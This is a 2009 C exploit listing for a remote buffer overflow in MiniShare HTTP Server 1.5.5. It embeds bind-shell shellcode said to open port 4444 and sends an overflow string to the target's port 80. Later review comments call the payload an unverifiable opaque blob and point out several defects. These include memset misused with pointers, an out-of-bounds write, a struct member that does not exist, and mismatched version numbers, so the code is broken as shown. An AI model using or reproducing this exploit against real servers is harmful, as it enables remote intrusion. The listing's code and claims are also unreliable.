# Title : MiniShare HTTP 1.5.5 BoF
# Published : 2009-10-19
# Author : iM4n
/*
MiniShare HTTP Server 1.5.5 Remote Buffer overflow Exploit by eMP3R0r TEAM
This bug Expl0ited and Discovered by iM4n
Sp Tnx2 : Shabgard & Aria Security FOrum
The Crimson Idol
*/
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <dos.h>
#pragma comment(lib, "ws2_32.lib")
#define buffer 557
#define PORT 80
#define NOP 0x90
/* Bind Shell open port 4444 */
/*
 * Payload that main() transmits to the target: adjacent string literals the
 * compiler concatenates into one char array (the trailing '\0' is excluded
 * by the sizeof(shellcode)-1 at the use site).
 *
 * NOTE(review): this is an opaque byte blob.  Nothing on this page lets a
 * reader verify that it does what the one-line comment above claims, and
 * payloads in public exploit listings are a well-known place for unrelated
 * or malicious code to hide.  Treat it as untrusted input, not as documented
 * behaviour.
 */
char shellcode[]=
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4fx85"
"x2fx98x83xebxfcxe2xf4xb3x6dx79x98x4fx85x7cxcdx19"
"xd2xa4xf4x6bx9dxa4xddx73x0ex7bx9dx37x84xc5x13x05"
"x9dxa4xc2x6fx84xc4x7bx7dxccxa4xacxc4x84xc1xa9xb0"
"x79x1ex58xe3xbdxcfxecx48x44xe0x95x4ex42xc4x6ax74"
"xf9x0bx8cx3ax64xa4xc2x6bx84xc4xfexc4x89x64x13x15"
"x99x2ex73xc4x81xa4x99xa7x6ex2dxa9x8fxdax71xc5x14"
"x47x27x98x11xefx1fxc1x2bx0ex36x13x14x89xa4xc3x53"
"x0ex34x13x14x8dx7cxf0xc1xcbx21x74xb0x53xa6x5fxce"
"x69x2fx99x4fx85x78xcex1cx0cxcax70x68x85x2fx98xdf"
"x84x2fx98xf9x9cx37x7fxebx9cx5fx71xaaxccxa9xd1xeb"
"x9fx5fx5fxebx28x01x71x96x8cxdax35x84x68xd3xa3x18"
"xd6x1dxc7x7cxb7x2fxc3xc2xcex0fxc9xb0x52xa6x47xc6"
"x46xa2xedx5bxefx28xc1x1exd6xd0xacxc0x7ax7ax9cx16"
"x0cx2bx16xadx77x04xbfx1bx7ax18x67x1axb5x1ex58x1f"
"xd5x7fxc8x0fxd5x6fxc8xb0xd0x03x11x88xb4xf4xcbx1c"
"xedx2dx98x5exd9xa6x78x25x95x7fxcfxb0xd0x0bxcbx18"
"x7ax7axb0x1cxd1x78x67x1axa5xa6x5fx27xc6x62xdcx4f"
"x0cxccx1fxb5xb4xefx15x33xa1x83xf2x5axdcxdcx33xc8"
"x7fxacx74x1bx43x6bxbcx5fxc1x49x5fx0bxa1x13x99x4e"
"x0cx53xbcx07x0cx53xbcx03x0cx53xbcx1fx08x6bxbcx5f"
"xd1x7fxc9x1exd4x6exc9x06xd4x7excbx1ex7ax5ax98x27"
"xf7xd1x2bx59x7ax7ax9cxb0x55xa6x7exb0xf0x2fxf0xe2"
"x5cx2ax56xb0xd0x2bx11x8cxefxd0x67x79x7axfcx67x3a"
"x85x47x68xc5x81x70x67x1ax81x1ex43x1cx7axffx98";
/*
 * Entry point.  Fills a fixed-size buffer, resolves the host given in
 * argv[1], connects to it on the compile-time PORT and sends the buffer.
 *
 * argv[1]  host name or dotted IPv4 address of the target
 * argv[2]  shown as "Port" in the usage text but never read: the connection
 *          always goes to PORT (80) from the #define above
 * Returns 0 after the send attempt; calls exit(-1) on usage, WSAStartup,
 * name-resolution and socket-creation failures.
 *
 * NOTE(review): as rendered here the printf strings contain a bare "n"
 * where a newline escape was evidently meant; they are left untouched
 * because string literals are program behaviour, not documentation.
 * The banner below says 1.5.4 while the page title says 1.5.5.
 */
int main(int argc, char *argv[])
{
/* mini1: numeric address from inet_addr(), only assigned when gethostbyname()
 * fails; mini2: connect() result; tcp: the socket descriptor. */
int mini1,mini2,tcp;
if (argc < 3)
{
printf("n MiniShare HTTP Server 1.5.4 Remote Buffer overflow Exploit by eMP3R0r TEAM n");
printf("n This bug Expl0ited and Discovered by iM4n n");
printf("n Usage : File.exe IPAdress Port n");
printf("n Ex : iM4n.exe 127.0.0.1 80 n");
exit(-1);
}
/* buffer (557) bytes, pre-filled with the NOP constant. */
char overflow[buffer];
memset(overflow,NOP,buffer);
/* 4-byte constant; its meaning is not documented on this page. */
char win[] = "xEDx1Ex94x7C";
/* NOTE(review): memset() takes an int fill value as its second argument.
 * Passing the array `win` (and `shellcode` on the next line) converts a
 * pointer to int rather than copying any bytes, so these two calls do not do
 * what their position suggests; a conforming compiler warns on both. */
memset(overflow,win,sizeof(win)-1);
memset(overflow,shellcode,sizeof(shellcode)-1);
/* Out-of-bounds write: overflow has `buffer` elements, valid indices end at
 * buffer-1.  overflow[buffer] is one past the end -- undefined behaviour in
 * this process, independent of anything the remote side does. */
overflow[buffer] = 0;
WSADATA wsaData;
/* Requests Winsock 2.1; WSACleanup() is never called on any path below. */
if(WSAStartup(MAKEWORD(2,1),&wsaData) != 0 )
{
printf("n windows socket is failed ! n");
exit(-1);
}
/* Try DNS first, then fall back to treating argv[1] as a dotted address.
 * mini1 is only read when `remote` is NULL, so the short-circuit on the
 * second `if` keeps it from being read uninitialised. */
struct hostent *remote;
remote = gethostbyname (argv[1]);
if (! remote)
{
mini1=inet_addr(argv[1]);
}
if ((! remote) && (mini1 == INADDR_NONE))
{
printf("n unable ro resolve %s n",argv[1]);
exit(-1);
}
tcp = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
/* NOTE(review): Winsock signals a failed socket() with INVALID_SOCKET, not
 * 0, so this test does not catch the failure case. */
if (! tcp)
{
printf("n Socket Not created !n");
exit(-1);
}
/* `http` is never zeroed, so sin_zero holds stack garbage. */
struct sockaddr_in http;
/* NOTE(review): same memset()-with-a-pointer misuse as above, and struct
 * hostent has no member named `length` (the field is h_length), so this line
 * does not compile as written. */
if (remote != NULL)
memset(&(http.sin_addr),remote->h_addr,remote->length);
else
http.sin_addr.s_addr = mini1;
if(remote)
http.sin_family = remote->h_addrtype;
else
http.sin_family = AF_INET;
/* Always PORT (80); argv[2] is ignored despite the usage text. */
http.sin_port = htons(PORT);
printf("n Attacking on HTTP Server ...! %sn",argv[1]);
/* sleep() is not declared by any standard header included here -- presumably
 * from <dos.h>; whether the argument is seconds or milliseconds is not
 * established by this listing.  TODO confirm for the intended toolchain. */
sleep(400);
/* The extra sizeof(overflow) argument has no matching conversion
 * specification and is silently ignored by printf. */
printf("n Sending String on Target ...n",sizeof(overflow));
sleep(300);
mini2 = connect (tcp ,(struct sockaddr *) &http,sizeof(struct sockaddr_in));
if(mini2 == 0)
{
printf("n Sending Socket ...!n");
sleep(500);
printf("n connecting ...!n");
/* Sends all 557 bytes in one call; the return value (partial send or
 * SOCKET_ERROR) is not checked. */
send(tcp,overflow,sizeof(overflow),0);
printf("n Exploit Done !n");
// attack on port 4444
printf("n exploit runed ! please telnet ip address and Port 4444 ! n");
}
else
{
/* The connect() that failed was to PORT (80), not 4444; the message below is
 * misleading about which port was unreachable. */
printf("n Exploit not done and ip address machin not listening in Port 4444! n");
}
/* shutdown(how=1) closes the send direction only, then the socket is released. */
shutdown(tcp,1);
closesocket(tcp);
return 0;
}